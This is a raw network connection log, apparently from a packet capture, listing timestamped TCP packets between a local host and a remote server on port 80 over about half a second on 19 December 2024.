Dec 19, 2024 08:47:34.079216957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.079241037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.079879045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.080034971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.080058098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.080761909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.080811024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.229317904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.229422092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.229532957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.229784966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.230159998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.230221987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.230535030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.230880976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.231021881 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.231368065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.232052088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.232235909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.232259035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.232584953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.232603073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.232640982 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.233290911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.233366966 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.233696938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.233971119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.234069109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.236833096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.237159014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.237217903 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.237510920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.237732887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.237823009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.238213062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.238538027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.238692999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.238845110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.239183903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.239238024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.239587069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.239939928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.240001917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.240392923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.240560055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.240611076 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.241307020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.241489887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.241760015 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.242115021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.242305040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.242389917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.242815018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.242978096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.243063927 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.243379116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.243717909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.244009972 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.244041920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.244276047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.244363070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.244704008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.245104074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.245235920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.245326042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.245937109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.245954990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.245999098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.246778965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.246857882 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.246890068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.247459888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.247597933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.247699022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.248311996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.248380899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.248439074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.249042034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.249139071 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.249212980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.249842882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.249916077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.250037909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.250647068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.250734091 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.250912905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.251472950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.251580954 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.251749039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.252340078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.252454996 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.252480984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.253015041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.253096104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.253289938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.253863096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.253935099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.254066944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.254604101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.254683018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.254812002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.255371094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.255642891 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.255664110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.256153107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.256226063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.256349087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.257061958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.257281065 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.257303953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.258094072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.258261919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.258287907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.258657932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.258807898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.258891106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.259366989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.259382010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.259470940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.260227919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.260313988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.260344982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.260987997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.261064053 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.261223078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.261797905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.261933088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.261971951 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.262511015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.262589931 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.262698889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.263366938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.263436079 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.263526917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.264305115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.264390945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.264426947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.264880896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.264950037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.265048981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.265661955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.265839100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.265867949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.266619921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.266758919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.266788006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.267263889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.267352104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.267468929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.268239021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.268307924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.268347025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.268825054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.268912077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.269048929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.269619942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.269722939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.269810915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.270523071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.270581961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.270663023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.271301031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.271356106 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.271384954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.272080898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.272208929 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.272237062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.272877932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.272962093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.421334982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.421581030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.421658039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.421915054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.422350883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.422410011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.422636032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.422909975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.422970057 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.423655033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.424510002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.424593925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.424623966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.424981117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.424998045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.425031900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.425746918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.425796986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.426028013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.426409960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.426455021 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.429018974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.429193974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.429399014 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.429604053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.429966927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.430016994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.430293083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.430603027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.430653095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.431508064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.431885958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.431952000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.432359934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.432375908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.432502031 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.433130026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.433448076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.433547974 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.433779001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.433795929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.433981895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.434845924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.434863091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.434972048 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.435544968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.435563087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.435693979 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.437074900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.437094927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.437202930 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.437485933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.437706947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.437722921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.437766075 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.438415051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.438431025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.438555956 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.439162970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.439184904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.439235926 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.439881086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.439898968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.439941883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.440560102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.440579891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.440727949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.441270113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.441284895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.441349030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.441953897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.441972017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.442008018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.442651987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.442667961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.442708969 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.443365097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.443532944 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.443783045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.444044113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.444060087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.444120884 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.444778919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.444920063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.445060015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.445555925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.445682049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.445777893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.446154118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.446221113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.446491003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.446851015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.446940899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.447191954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.447606087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.447649956 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.447899103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.448453903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.448518991 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.448604107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.449229002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.449292898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.449512005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.450057030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.450151920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.450264931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.450773954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.450881958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.450911045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.451534033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.451577902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.451730013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.452320099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.452403069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.452511072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.453144073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.453214884 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.453325033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.453946114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.454094887 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.454121113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.454736948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.454809904 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.454956055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.455672026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.455693960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.455718994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.456270933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.456410885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.456481934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.457129002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.457333088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.457355976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.457878113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.458000898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.458045006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.459672928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.459805012 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.460258961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.460277081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.460293055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.460371017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.461796999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.461886883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.462542057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.462559938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.462640047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.463325977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.463345051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.463407040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.464132071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.464148998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.464179039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.464863062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.464880943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.464924097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.465625048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.465641022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.465718985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.466053009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.466329098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.466377974 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.613595963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.613781929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.613904953 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.614154100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.614464998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.614547014 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.614869118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.615192890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.615242004 CET	49707	80	192.168.2.7	194.87.47.113
